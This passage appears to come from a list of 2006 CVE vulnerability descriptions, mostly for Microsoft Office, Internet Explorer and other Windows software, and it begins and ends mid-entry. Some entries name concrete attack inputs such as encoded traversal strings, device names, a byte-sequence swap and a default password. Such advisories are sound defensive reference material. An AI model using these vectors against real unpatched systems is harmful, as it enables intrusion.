NtCreateProcess, (3) NtCreateProcessEx, (4) NtCreateSection, (5) NtCreateSymbolicLinkObject, (6) NtCreateThread, (7) NtDeleteValueKey, (8) NtLoadKey2, (9) NtOpenKey, (10) NtOpenProcess, (11) NtOpenSection, and (12) NtQueryValueKey hooked system calls, which allows local users to cause a denial of service (reboot) via an invalid parameter, as demonstrated by the ClientId parameter to NtOpenProcess. [CVE-2006-3059] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors. NOTE: this is a different vulnerability than CVE-2006-3086. [CVE-2006-3014] Microsoft Excel allows user-assisted attackers to execute arbitrary javascript and redirect users to arbitrary sites via an Excel spreadsheet with an embedded Shockwave Flash Player ActiveX Object, which is automatically executed when the user opens the spreadsheet. [CVE-2006-2919] Unspecified vulnerability in Microsoft NetMeeting 3.01 allows remote attackers to cause a denial of service (crash or CPU consumption) and possibly execute arbitrary code via crafted inputs that trigger memory corruption. [CVE-2006-2856] ActiveState ActivePerl 5.8.8.817 for Windows configures the site/lib directory with "Users" group permissions for changing files, which allows local users to gain privileges by creating a malicious sitecustomize.pl file in that directory. NOTE: The provenance of this information is unknown [CVE-2006-2838] Buffer overflow in the web console in F-Secure Anti-Virus for Microsoft Exchange 6.40, and Internet Gatekeeper 6.40 through 6.42 and 6.50 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors. NOTE: By default, the connections are only allowed from the local host. [CVE-2006-2719] JIWA Financials 6.4.14 stores usernames and passwords for all accounts in cleartext in the HR_Staff table in Microsoft SQL Server, and sends the usernames and passwords in cleartext to the application's SQL Server ODBC driver, which might allow context-dependent attackers to obtain the passwords. [CVE-2006-2718] JIWA Financials 6.4.14 passes a Microsoft SQL Server account's username and password, and the name of a data source, to a Crystal Reports .rpt file, which allows remote authenticated users to execute certain standard stored procedures by referencing them in a user-written .rpt file, as demonstrated by using a stored procedure that provides the username and cleartext password of every account. [CVE-2006-2679] Unspecified vulnerability in the VPN Client for Windows Graphical User Interface (GUI) (aka the VPN client dialer) in Cisco VPN Client for Windows 4.8.00.* and earlier, except for 4.7.00.0533, allows local authenticated, interactive users to gain privileges, possibly due to privileges of dialog boxes, aka bug ID CSCsd79265. [CVE-2006-2612] Novell Client for Windows 4.8 and 4.9 does not restrict access to the clipboard contents while a machine is locked, which allows users with physical access to read the current clipboard contents by pasting them into the "User Name" field on the login prompt. [CVE-2006-2492] Buffer overflow in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack. [CVE-2006-2389] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with a malformed property that triggers memory corruption related to record lengths, aka "Microsoft Office Property Vulnerability," a different vulnerability than CVE-2006-1316. [CVE-2006-2388] Microsoft Office Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via malformed cell comments, which lead to modification of "critical data offsets" during the rebuilding process. [CVE-2006-2387] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, Excel Viewer 2003, and Microsoft Works Suite 2004 through 2006 allows user-assisted attackers to execute arbitrary code via a crafted DATETIME record in an XLS file, a different vulnerability than CVE-2006-3867 and CVE-2006-3875. [CVE-2006-2385] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption when it is saved as a multipart HTML (.mht) file. [CVE-2006-2384] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to conduct spoofing and phishing attacks by using a modal browser window in a way that preserves the original address bar and trusted UI of a trusted site, even after the browser has been navigated to a malicious site, aka the "Address Bar Spoofing Vulnerability." [CVE-2006-2383] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via "unexpected data" related to "parameter validation" in the DXImageTransform.Microsoft.Light ActiveX control, which causes Internet Explorer to crash in a way that enables the code execution. [CVE-2006-2382] Heap-based buffer overflow in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via crafted UTF-8 encoded HTML that results in size discrepancies during conversion to Unicode, aka "HTML Decoding Memory Corruption Vulnerability." [CVE-2006-2312] Argument injection vulnerability in the URI handler in Skype 2.0..104 and 2.5..0 through 2.5..78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches. [CVE-2006-2311] Cross-site scripting (XSS) vulnerability in BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to inject arbitrary web script or HTML via the filename in a request to a (1) .cfm or (2) .cfml file, which reflects the result in the default error page. [CVE-2006-2310] BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to cause a denial of service (hang) via a request for a .cfm file whose name contains an MS-DOS device name such as (1) con, (2) aux, (3) com1, and (4) com2. [CVE-2006-2297] Heap-based buffer overflow in Microsoft Infotech Storage System Library (itss.dll) allows user-assisted attackers to execute arbitrary code via a crafted CHM / ITS file that triggers the overflow while decompiling. [CVE-2006-2273] The InstallProduct routine in the Verisign VUpdater.Install (aka i-Nav) ActiveX control does not verify Microsoft Cabinet (.CAB) files, which allows remote attackers to run an arbitrary executable file. [CVE-2006-2197] Integer overflow in wv2 before 0.2.3 might allow context-dependent attackers to execute arbitrary code via a crafted Microsoft Word document. [CVE-2006-2155] EMC Retrospect for Windows 6.5 before 6.5.382, 7.0 before 7.0.344, and 7.5 before 7.5.1.105 allows local users to execute arbitrary code by replacing the Retrospect.exe file, possibly due to improper file permissions. [CVE-2006-2154] EMC Retrospect for Windows 6.5 before 6.5.382, 7.0 before 7.0.344, and 7.5 before 7.5.1.105 does not drop privileges before opening files, which allows local users to execute arbitrary code via the File>Open dialog. [CVE-2006-2111] A component in Microsoft Outlook Express 6 allows remote attackers to bypass domain restrictions and obtain sensitive information via redirections with the mhtml: URI handler, as originally reported for Internet Explorer 6 and 7, aka "URL Redirect Cross Domain Information Disclosure Vulnerability." [CVE-2006-2092] Unspecified vulnerability in HP StorageWorks Secure Path for Windows 4.0C-SP2 before 20060419 allows remote attackers to cause an unspecified denial of service via unknown vectors. [CVE-2006-2058] Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-2057] Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-2055] Argument injection vulnerability in Microsoft Outlook 2003 SP1 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1992] mshtml.dll 6.00.2900.2873, as used in Microsoft Internet Explorer, allows remote attackers to cause a denial of service (crash) via nested OBJECT tags, which trigger invalid pointer dereferences including NULL dereferences. NOTE: the possibility of code execution was originally theorized, but Microsoft has stated that this issue is non-exploitable. [CVE-2006-1953] Directory traversal vulnerability in Caucho Resin 3.0.17 and 3.0.18 for Windows allows remote attackers to read arbitrary files via a "C:%5C" (encoded drive letter) in a URL. [CVE-2006-1952] Directory traversal vulnerability in WinAgents TFTP Server for Windows 3.1 and earlier allows remote attackers to read arbitrary files via "..." (triple dot) sequences in a GET request. [CVE-2006-1942] Mozilla Firefox 1.5.0.2 and possibly other versions before 1.5.0.4, Netscape 8.1, 8.0.4, and 7.2, and K-Meleon 0.9.13 allows user-assisted remote attackers to open local files via a web page with an IMG element containing a SRC attribute with a non-image file:// URL, then tricking the user into selecting View Image for the broken image, as demonstrated using a .wma file to launch Windows Media Player, or by referencing an "alternate web page." [CVE-2006-1934] Multiple buffer overflows in Ethereal 0.10.x up to 0.10.14 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) ALCAP dissector, (2) Network Instruments file code, or (3) NetXray/Windows Sniffer file code. [CVE-2006-1774] HP System Management Homepage (SMH) 2.1.3.132, when running on CompaqHTTPServer/9.9 on Windows, Linux, or Tru64 UNIX, and when "Trust by Certificates" is not enabled, allows remote attackers to bypass authentication via a crafted URL. [CVE-2006-1725] Mozilla Firefox 1.5 before 1.5.0.2 and SeaMonkey before 1.0.1 causes certain windows to become translucent due to an interaction between XUL content windows and the history mechanism, which might allow user-assisted remote attackers to trick users into executing arbitrary code. [CVE-2006-1626] Internet Explorer 6 for Windows XP SP2 and earlier allows remote attackers to spoof the address bar and possibly conduct phishing attacks by re-opening the window to a malicious Shockwave Flash application, then changing the window location back to a trusted URL while the Flash application is still loading. NOTE: this is a different vulnerability than CVE-2006-1192. [CVE-2006-1540] MSO.DLL in Microsoft Office 2000, Office XP (2002), and Office 2003 allows user-assisted attackers to cause a denial of service and execute arbitrary code via multiple attack vectors, as originally demonstrated using a crafted document record with a malformed string, as demonstrated by replacing a certain "01 00 00 00" byte sequence with an "FF FF FF FF" byte sequence, possibly causing an invalid array index, in (1) an Excel .xls document, which triggers an access violation in ole32.dll [CVE-2006-1511] Buffer overflow in the ILASM assembler in the Microsoft .NET 1.0 and 1.1 Framework might allow user-assisted attackers to execute arbitrary code via a .il file that calls a function with a long name. [CVE-2006-1483] Blazix Web Server before 1.2.6, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot), (2) space, and (3) slash characters in the extension of a URL. [CVE-2006-1467] Integer overflow in the AAC file parsing code in Apple iTunes before 6.0.5 on Mac OS X 10.2.8 or later, and Windows XP and 2000, allows remote user-assisted attackers to execute arbitrary code via an AAC (M4P, M4A, or M4B) file with a sample table size (STSZ) atom with a "malformed" sample_size_table value. [CVE-2006-1394] Multiple cross-site scripting (XSS) vulnerabilities in the Microsoft IIS ISAPI filter (aka application server module) in University of Washington Pubcookie 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors. [CVE-2006-1388] Unspecified vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to execute HTA files via unknown vectors. [CVE-2006-1378] PasswordSafe 3.0 beta, when running on Windows before XP, uses a weak random number generator (C++ rand function) during generation of the database encryption key, which makes it easier for attackers to decrypt the database and steal passwords by generating keys for all possible rand() seed values and conducting a known plaintext attack. [CVE-2006-1364] Microsoft w3wp (aka w3wp.exe) does not properly handle when the AspCompat directive is not used when referencing COM components in ASP.NET, which allows remote attackers to cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or are restricted documents located under the ASP.NET application path. [CVE-2006-1359] Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer. [CVE-2006-1316] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with malformed string that triggers memory corruption related to record lengths, aka "Microsoft Office Parsing Vulnerability," a different vulnerability than CVE-2006-2389. [CVE-2006-1309] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted LABEL record that triggers memory corruption. [CVE-2006-1308] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted FNGROUPCOUNT value. [CVE-2006-1306] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted BIFF record with an attacker-controlled array index that is used for a function pointer, aka "Malformed OBJECT record Vulnerability." [CVE-2006-1305] Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to cause a denial of service (memory exhaustion and interrupted mail recovery) via malformed e-mail header information, possibly related to (1) long subject lines or (2) large numbers of recipients in To or CC headers. [CVE-2006-1304] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted COLINFO record, which triggers the overflow during a "data filling operation." [CVE-2006-1303] Multiple unspecified vulnerabilities in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allow remote attackers to execute arbitrary code by instantiating certain COM objects from Wmm2fxa.dll as ActiveX controls including (1) DXImageTransform.Microsoft.MMSpecialEffect1Input, (2) DXImageTransform.Microsoft.MMSpecialEffect1Input.1, (3) DXImageTransform.Microsoft.MMSpecialEffect2Inputs, (4) DXImageTransform.Microsoft.MMSpecialEffect2Inputs.1, (5) DXImageTransform.Microsoft.MMSpecialEffectInplace1Input, and (6) DXImageTransform.Microsoft.MMSpecialEffectInplace1Input.1, which causes memory corruption during garbage collection. [CVE-2006-1302] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with certain crafted fields in a SELECTION record, which triggers memory corruption, aka "Malformed SELECTION record Vulnerability." [CVE-2006-1301] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302. [CVE-2006-1298] Format string vulnerability in the Job Engine service (bengine.exe) in the Media Server in Veritas Backup Exec 10d (10.1) for Windows Servers rev. 5629, Backup Exec 10.0 for Windows Servers rev. 5520, Backup Exec 10.0 for Windows Servers rev. 5484, and Backup Exec 9.1 for Windows Servers rev. 4691, when the job log mode is Full Detailed (aka Full Details), allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via a crafted filename on a machine that is backed up by Backup Exec. [CVE-2006-1297] Unspecified vulnerability in Veritas Backup Exec for Windows Server Remote Agent 9.1 through 10.1, for Netware Servers and Remote Agent 9.1 and 9.2, and Remote Agent for Linux Servers 10.0 and 10.1 allow attackers to cause a denial of service (application crash or unavailability) due to "memory errors." [CVE-2006-1257] The sample files in the authfiles directory in Microsoft Commerce Server 2002 before SP2 allow remote attackers to bypass authentication by logging in to authfiles/login.asp with a valid username and any password, then going to the main site twice. [CVE-2006-1245] Buffer overflow in mshtml.dll in Microsoft Internet Explorer 6.0.2900.2180, and probably other versions, allows remote attackers to execute arbitrary code via an HTML tag with a large number of script action handlers such as onload and onmouseover, as demonstrated using onclick, aka the "Multiple Event Handler Memory Corruption Vulnerability." [CVE-2006-1193] Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing." [CVE-2006-1192] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. [CVE-2006-1191] Microsoft Internet Explorer 5.01 through 6 does not always correctly identify the domain that is associated with a browser window, which allows remote attackers to obtain sensitive cross-domain information and spoof sites by running script after the user has navigated to another site. [CVE-2006-1190] Microsoft Internet Explorer 5.01 through 6 does not always return the correct IOleClientSite information when dynamically creating an embedded object, which could cause Internet Explorer to run the object in the wrong security context or zone, and allow remote attackers to execute arbitrary code. [CVE-2006-1189] Buffer overflow in URLMON.DLL in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via a crafted URL with an International Domain Name (IDN) using double-byte character sets (DBCS), aka the "Double Byte Character Parsing Memory Corruption Vulnerability." [CVE-2006-1188] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. [CVE-2006-1186] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via by instantiating the (1) Mdt2gddr.dll, (2) Mdt2dd.dll, and (3) Mdt2gddo.dll COM objects as ActiveX controls, which leads to memory corruption. [CVE-2006-1185] Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. [CVE-2006-1166] Monotone 0.25 and earlier, when a user creates a file in a directory called "mt", and when checking out that file on a case-insensitive file system such as Windows or Mac OS X, places the file into the "MT" bookkeeping directory, which could allow context-dependent attackers to execute arbitrary Lua programs as the user running monotone. [CVE-2006-1161] Absolute path traversal vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote registered users to execute arbitrary code by uploading a malicious file to the Windows startup folder. [CVE-2006-1043] Stack-based buffer overflow in Microsoft Visual Studio 6.0 and Microsoft Visual InterDev 6.0 allows user-assisted attackers to execute arbitrary code via a long DataProject field in a (1) Visual Studio Database Project File (.dbp) or (2) Visual Studio Solution (.sln). [CVE-2006-1023] Directory traversal vulnerability in HP System Management Homepage (SMH) 2.0.0 through 2.1.4 on Windows allows remote attackers to access certain files via unspecified vectors. [CVE-2006-1016] Buffer overflow in the IsComponentInstalled method in Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument. [CVE-2006-1009] M4 Project enigma-suite before 0.73.3 (Windows) has a default password of "nominal" for the "enigma-client" account, which allows local users to gain access. [CVE-2006-0994] Multiple Sophos Anti-Virus products, including Anti-Virus for Windows 5.x before 5.2.1 and 4.x before 4.05, when cabinet file inspection is enabled, allows remote attackers to execute arbitrary code via a CAB file with "invalid folder count values," which leads to heap corruption. [CVE-2006-0991] Buffer overflow in the NetBackup Sharepoint Services server daemon (bpspsserver) on NetBackup 6.0 for Windows allows remote attackers to execute arbitrary code via crafted "Request Service" packets to the vnetd service (TCP port 13724). [CVE-2006-0935] Microsoft Word 2003 allows remote attackers to cause a denial of service (application crash) via a crafted file, as demonstrated by 101_filefuzz. [CVE-2006-0858] Unquoted Windows search path vulnerability in (1) snsmcon.exe, (2) the autostartup mechanism, and (3) an unspecified installation component in StarForce Safe'n'Sec Personal + Anti-Spyware 2.0 and earlier, and possibly other StarForce Safe'n'Sec products, might allow local users to gain privileges via a malicious "program" file in the C: folder. [CVE-2006-0818] Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558. [CVE-2006-0817] Absolute path directory traversal vulnerability in (a) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (b) VisNetic MailServer before 8.5.0.5 allows remote attackers to include arbitrary files via a full Windows path and drive letter in the (1) language parameter in accounts/inc/include.php and (2) lang_settings parameter in admin/inc/include.php, which is not properly sanitized by the securepath function, a related issue to CVE-2005-4556. [CVE-2006-0816] Orion Application Server before 2.0.7, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot) and (2) space characters in the extension of a URL. [CVE-2006-0814] response.c in Lighttpd 1.4.10 and possibly previous versions, when run on Windows, allows remote attackers to read arbitrary source code via requests that contain trailing (1) "." (dot) and (2) space characters, which are ignored by Windows, as demonstrated by PHP files. [CVE-2006-0799] Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate "href" attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different. [CVE-2006-0773] Cross-site scripting (XSS) vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the extended receiving box function. [CVE-2006-0772] SQL injection vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to execute arbitrary SQL commands via unspecified vectors in the extended receiving box function. [CVE-2006-0766] ICQ Inc. (formerly Mirabilis) ICQ 2003a, 2003b, Lite 4.0, Lite 4.1, and possibly other Windows versions allows user-assisted remote attackers to hide malicious file extensions and bypass Windows security warnings via a filename that ends in an assumed-safe extension such as JPG, and possibly containing other modified properties such as company name, icon, and description, which could trick a user into executing arbitrary programs. [CVE-2006-0765] GUI display truncation vulnerability in ICQ Inc. (formerly Mirabilis) ICQ 2003a, 2003b, Lite 4.0, Lite 4.1, and possibly other Windows versions allows user-assisted remote attackers to hide malicious file extensions, bypass Windows security warnings via a filename that is all uppercase and of a specific length, which truncates the malicious extension from the display and could trick a user into executing arbitrary programs. [CVE-2006-0761] Buffer overflow in BlackBerry Attachment Service in Research in Motion (RIM) BlackBerry Enterprise Server 2.2 and 4.0 before SP3 Hotfix 4 for IBM Lotus Domino, 3.6 before SP7 and 5.0 before SP3 Hotfix 3 for Microsoft Exchangem, and 4.0 for Novell GroupWise before SP3 Hotfix 1 might allow user-assisted remote attackers to execute arbitrary code on the server via a crafted Microsoft Word document that is opened on a wireless device. [CVE-2006-0705] Format string vulnerability in a logging function as used by various SFTP servers, including (1) AttachmateWRQ Reflection for Secure IT UNIX Server before 6.0.0.9, (2) Reflection for Secure IT Windows Server before 6.0 build 38, (3) F-Secure SSH Server for Windows before 5.3 build 35, (4) F-Secure SSH Server for UNIX 3.0 through 5.0.8, (5) SSH Tectia Server 4.3.6 and earlier and 4.4.0, and (6) SSH Shell Server 3.2.9 and earlier, allows remote authenticated users to execute arbitrary commands via unspecified vectors, involving crafted filenames and the stat command. [CVE-2006-0656] Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than CVE-2005-2006. [CVE-2006-0611] Directory traversal vulnerability in compose.pl in @Mail 4.3 and earlier for Windows allows remote attackers to upload arbitrary files to arbitrary locations via a .. (dot dot) in the unique parameter. [CVE-2006-0585] jscript.dll in Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (application crash) via a Shockwave Flash object that contains ActionScript code that calls VBScript, which in turn calls the Javascript document.write function, which triggers a null dereference. [CVE-2006-0564] Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field. [CVE-2006-0544] urlmon.dll in Microsoft Internet Explorer 7.0 beta 2 (aka 7.0.5296.0) allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a BGSOUND element with its SRC attribute set to "file://" followed by a large number of "-" (dash of hyphen) characters. [CVE-2006-0488] The VDM (Virtual DOS Machine) emulation environment for MS-DOS applications in Windows 2000, Windows XP SP2, and Windows Server 2003 allows local users to read the first megabyte of memory and possibly obtain sensitive information, as demonstrated by dumper.asm. [CVE-2006-0376] The 802.11 wireless client in certain operating systems including Windows 2000, Windows XP, and Windows Server 2003 does not warn the user when (1) it establishes an association with a station in ad hoc (aka peer-to-peer) mode or (2) a station in ad hoc mode establishes an association with it, which allows remote attackers to put unexpected wireless communication into place. [CVE-2006-0368] Cisco CallManager 3.2 and earlier, 3.3 before 3.3(5)SR1, 4.0 before 4.0(2a)SR2c, and 4.1 before 4.1(3)SR2 allow remote attackers to (1) cause a denial of service (CPU and memory consumption) via a large number of open TCP connections to port 2000 and (2) cause a denial of service (fill the Windows Service Manager communication queue) via a large number of TCP connections to port 2001, 2002, or 7727. [CVE-2006-0363] The "Remember my Password" feature in MSN Messenger 7.5 stores passwords in an encrypted format under the HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds registry key, which might allow local users to obtain the original passwords via a program that calls CryptUnprotectData, as demonstrated by the "MSN Password Recovery.exe" program. NOTE: it could be argued that local-only password recovery is inherently insecure because the decryption methods and keys must be stored somewhere on the local system, and are thus inherently accessible with varying degrees of effort. Perhaps this issue should not be included in CVE. [CVE-2006-0338] Multiple F-Secure Anti-Virus products and versions for Windows and Linux, including Anti-Virus for Windows Servers 5.52 and earlier, Internet Security 2004, 2005 and 2006, and Anti-Virus for Linux Servers 4.64 and earlier, allow remote attackers to hide arbitrary files and data via malformed (1) RAR and (2) ZIP archives, which are not properly scanned. [CVE-2006-0337] Buffer overflow in multiple F-Secure Anti-Virus products and versions for Windows and Linux, including Anti-Virus for Windows Servers 5.52 and earlier, Internet Security 2004, 2005 and 2006, and Anti-Virus for Linux Servers 4.64 and earlier, allows remote attackers to execute arbitrary code via crafted ZIP archives. [CVE-2006-0255] Unquoted Windows search path vulnerability in Check Point VPN-1 SecureClient might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run when SecureClient attempts to launch the Sr_GUI.exe program. [CVE-2006-0229] Unquoted Windows search path vulnerability in Wehntrust might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run when Wehntrust creates the autostart key. [CVE-2006-0187] By design, Microsoft Visual Studio 2005 automatically executes code in the Load event of a user-defined control (UserControl1_Load function), which allows user-assisted attackers to execute arbitrary code by tricking the user into opening a malicious Visual Studio project file. [CVE-2006-0166] Symantec Norton SystemWorks and SystemWorks Premier 2005 and 2006 stores temporary copies of files in the Norton Protected Recycle Bin NProtect directory, which is hidden from the FindFirst and FindNext Windows APIs and allows remote attackers to hide arbitrary files from virus scanners and other products. [CVE-2006-0106] gdi/driver.c and gdi/printdrv.c in Wine 20050930, and other versions, implement the SETABORTPROC GDI Escape function call for Windows Metafile (WMF) files, which allows attackers to execute arbitrary code, the same vulnerability as CVE-2005-4560 but in a different codebase. [CVE-2006-0105] PostgreSQL 8.0.x before 8.0.6 and 8.1.x before 8.1.2, when running on Windows, allows remote attackers to cause a denial of service (postmaster exit and no new connections) via a large number of simultaneous connection requests. [CVE-2006-0097] Stack-based buffer overflow in the create_named_pipe function in libmysql.c in PHP 4.3.10 and 4.4.x before 4.4.3 for Windows allows attackers to execute arbitrary code via a long (1) arg_host or (2) arg_unix_socket argument, as demonstrated by a long named pipe variable in the host argument to the mysql_connect function. [CVE-2006-0057] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to bypass the Kill bit settings for dangerous ActiveX controls via unknown vectors involving crafted HTML, which can expose the browser to attacks that would otherwise be prevented by the Kill bit setting. NOTE: CERT/CC claims that MS05-054 fixes this issue, but it is not described in MS05-054. [CVE-2006-0033] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted PNG image that triggers memory corruption when it is parsed. [CVE-2006-0031] Stack-based buffer overflow in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed record with a modified length value, which leads to memory corruption. [CVE-2006-0030] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed graphic, which leads to memory corruption. [CVE-2006-0029] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed description, which leads to memory corruption. [CVE-2006-0028] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via a BIFF parsing format file containing malformed BOOLERR records that lead to memory corruption, probably involving invalid pointers. [CVE-2006-0027] Unspecified vulnerability in Microsoft Exchange allows remote attackers to execute arbitrary code via e-mail messages with crafted (1) vCal or (2) iCal Calendar properties. [CVE-2006-0026] Buffer overflow in Microsoft Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows local and possibly remote attackers to execute arbitrary code via crafted Active Server Pages (ASP). [CVE-2006-0022] Unspecified vulnerability in Microsoft PowerPoint in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP1 and SP2, Office 2004 for Mac, and v. X for Mac allows user-assisted attackers to execute arbitrary code via a PowerPoint document with a malformed record, which triggers memory corruption. [CVE-2006-0015] Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. [CVE-2006-0009] Buffer overflow in Microsoft Office 2000 SP3, XP SP3, and other versions and packages, allows user-assisted attackers to execute arbitrary code via a routing slip that is longer than specified by the provided length field, as exploited by malware such as TROJ_MDROPPER.BH and Trojan.PPDropper.E in attacks against PowerPoint. [CVE-2006-0007] Buffer overflow in GIFIMP32.FLT, as used in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted GIF image that triggers memory corruption when it is parsed. [CVE-2006-0004] Microsoft PowerPoint 2000 in Office 2000 SP3 has an interaction with Internet Explorer that allows remote attackers to obtain sensitive information via a PowerPoint presentation that attempts to access objects in the Temporary Internet Files Folder (TIFF). [CVE-2006-0003] Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2006-0002] Unspecified vulnerability in Microsoft Outlook 2000 through 2003, Exchange 5.0 